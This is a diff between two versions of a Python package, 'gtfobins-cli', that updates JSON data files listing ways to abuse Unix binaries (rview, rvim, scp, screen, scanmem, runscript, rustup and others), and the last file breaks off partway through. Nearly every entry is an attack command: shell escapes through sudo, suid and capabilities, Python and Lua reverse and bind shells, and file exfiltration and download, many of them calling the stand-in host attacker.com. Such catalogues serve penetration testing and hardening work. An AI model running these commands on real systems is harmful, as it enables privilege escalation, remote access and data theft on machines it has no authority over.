gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/run-mailcap.json

@@ -2,27 +2,27 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "run-mailcap --action=view /etc/hosts\n!/bin/sh\n"
       }
     ],
     "file-read": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
-        "code": "run-mailcap --action=view [file]"
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "run-mailcap --action=view file_to_read\n"
       }
     ],
     "file-write": [
       {
-        "description": "The file must exist and be not empty. This invokes the default editor, which is likely to be 'vi', other functions may apply.",
-        "code": "run-mailcap --action=edit [file]"
+        "description": "The file must exist and be not empty.\n\nThis invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply.\n",
+        "code": "run-mailcap --action=edit file_to_read\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo run-mailcap --action=view /etc/hosts\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/run-parts.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "run-parts --new-session --regex '^sh$' /bin"
+        
+        "code": "run-parts --new-session --regex '^sh$' /bin\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo run-parts --new-session --regex '^sh$' /bin"
+        
+        "code": "sudo run-parts --new-session --regex '^sh$' /bin\n"
       }
     ],
     "suid": [
       {
-        "code": "./run-parts --new-session --regex '^sh$' /bin --arg='-p'"
+        
+        "code": "./run-parts --new-session --regex '^sh$' /bin --arg='-p'\n"
       }
     ]
   }
-}
+}

gtfo/data/runscript.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "TF=$(mktemp)\necho '! exec /bin/sh' >$TF\nrunscript $TF\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "TF=$(mktemp)\necho '! exec /bin/sh' >$TF\n./runscript $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "TF=$(mktemp)\necho '! exec /bin/sh' >$TF\nsudo runscript $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/rustdoc.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "rustdoc /path/to/input-file",
+        "comment": "Partial content is displayed as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "binary": false,
+        "code": "echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/",
+        "comment": "This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/rustfmt.json

@@ -0,0 +1,15 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "rustfmt /path/to/input-file",
+        "comment": "Partial content is displayed as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/rustup.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "command": [
+      {
+        "code": "mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "shell": [
+      {
+        "code": "mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/rview.json

@@ -2,98 +2,100 @@
   "functions": {
     "shell": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'rview' is compiled with Lua support.",
-        "code": "rview -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Lua support.",
+        "code": "rview -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "rview -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nrview -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rview -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nrview -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rview -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nrview -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nrview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
-        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nrview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rview -c ':lua local f=io.open(\"[file]\", \"rb\")\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nt:send(d);\nt:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nrview -c ':lua local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
-        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nrview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rview -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"LFILE\", \"wb\");\nf:write(d);\nio.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nrview -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "rview [file]\niDATA\n^[\nw!\n"
+        
+        "code": "rview file_to_write\niDATA\n^[\nw!\n"
       }
     ],
     "file-read": [
       {
-        "code": "rview [file]"
+        
+        "code": "rview file_to_read\n"
       }
     ],
     "library-load": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "rview -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "rview -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'\n"
       }
     ],
     "suid": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "sudo rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "sudo rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'rview' is compiled with Lua support.",
-        "code": "sudo rview -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Lua support.",
+        "code": "sudo rview -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./rview -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./rview -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "This requires that 'rview' is compiled with Lua support.",
-        "code": "./rview -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rview` is compiled with Lua support.",
+        "code": "./rview -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ]
   }

gtfo/data/rvim.json

@@ -2,99 +2,105 @@
   "functions": {
     "shell": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rvim` version is `< 9.0.1440`.",
+        "code": "rvim -c ':redir! > ~/.vimrc | echo \"!python3 -c \\'import pty; pty.spawn(\\\"/bin/bash\\\")\\'\" | redir END | set shell=/usr/bin/vim | diffpatch'\n"
       },
       {
-        "description": "This requires that 'rvim' is compiled with Lua support.",
-        "code": "rvim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
+      },
+      {
+        "description": "This requires that `rvim` is compiled with Lua support.",
+        "code": "rvim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "rvim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port])))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nrvim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'rvim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rvim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nrvim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'rvim' is compiled with Lua support and that `lua-socket` is installed.",
-        "code": "rvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nrvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nrvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
-        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nrvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rvim -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nrvim -c ':lua local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
-        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nrvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'rvim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "rvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",\"[port]\"));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nrvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "rvim [file]\niDATA\n^[\nw\n"
+        "description": "",
+        "code": "rvim file_to_write\niDATA\n^[\nw\n"
       }
     ],
     "file-read": [
       {
-        "code": "rvim [file]"
+        "description": "",
+        "code": "rvim file_to_read\n"
       }
     ],
     "library-load": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "rvim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "rvim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'\n"
       }
     ],
     "suid": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "sudo rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "sudo rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'rvim' is compiled with Lua support.",
-        "code": "sudo rvim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rvim` is compiled with Lua support.",
+        "code": "sudo rvim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./rvim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./rvim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "This requires that 'rvim' is compiled with Lua support.",
-        "code": "./rvim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `rvim` is compiled with Lua support.",
+        "code": "./rvim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ]
   }
-}
+}

gtfo/data/sash.json

@@ -2,17 +2,20 @@
   "functions": {
     "shell": [
       {
-        "code": "slsh -e 'system(\"/bin/sh\")'"
+        
+        "code": "sash\n"
       }
     ],
-    "sudo": [
+    "suid": [
       {
-        "code": "sudo slsh -e 'system(\"/bin/sh\")'"
+        
+        "code": "./sash\n"
       }
     ],
-    "limited-suid": [
+    "sudo": [
       {
-        "code": "./slsh -e 'system(\"/bin/sh\")'"
+        
+        "code": "sudo sash\n"
       }
     ]
   }

gtfo/data/scanmem.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "scanmem\nshell /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./scanmem\nshell /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo scanmem\nshell /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/scp.json

@@ -2,30 +2,33 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nscp -S $TF x y:\n"
       }
     ],
     "file-upload": [
       {
         "description": "Send local file to a SSH server.",
-        "code": "scp [file] [user@host:[file]]\n"
+        "code": "RPATH=user@attacker.com:~/file_to_save\nLPATH=file_to_send\nscp $LFILE $RPATH\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file from a SSH server.",
-        "code": "scp [user@host:[file]] [file]\n"
+        "code": "RPATH=user@attacker.com:~/file_to_get\nLFILE=file_to_save\nscp $RPATH $LFILE\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nsudo scp -S $TF x y:\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\n./scp -S $TF a b:\n"
       }
     ]
   }
-}
+}

gtfo/data/screen.json

@@ -2,23 +2,25 @@
   "functions": {
     "shell": [
       {
-        "code": "screen"
+        
+        "code": "screen\n"
       }
     ],
     "file-write": [
       {
-        "description": "This works on screen version 4.06.02. Data is appended to the file and '\\n' is converted to '\\r\\n'.",
-        "code": "screen -L -Logfile [file] echo DATA\n"
+        "description": "This works on screen version 4.06.02. Data is appended to the file and `\\n` is converted to `\\r\\n`.",
+        "code": "LFILE=file_to_write\nscreen -L -Logfile $LFILE echo DATA\n"
       },
       {
-        "description": "This works on screen version 4.05.00. Data is appended to the file and '\\n' is converted to '\\r\\n'.",
-        "code": "screen -L [file] echo DATA\n"
+        "description": "This works on screen version 4.05.00. Data is appended to the file and `\\n` is converted to `\\r\\n`.",
+        "code": "LFILE=file_to_write\nscreen -L $LFILE echo DATA\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo screen"
+        
+        "code": "sudo screen\n"
       }
     ]
   }
-}
+}

gtfo/data/script.json

@@ -2,19 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "script -q /dev/null"
+        
+        "code": "script -q /dev/null\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo script -q /dev/null"
+        
+        "code": "sudo script -q /dev/null\n"
       }
     ],
     "file-write": [
       {
         "description": "The wrote content is corrupted by debug prints.",
-        "code": "script -q -c 'echo DATA' [file]"
+        "code": "script -q -c 'echo DATA' file_to_write\n"
       }
     ]
   }
-}
+}

gtfo/data/scrot.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "scrot -e /bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./scrot -e /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
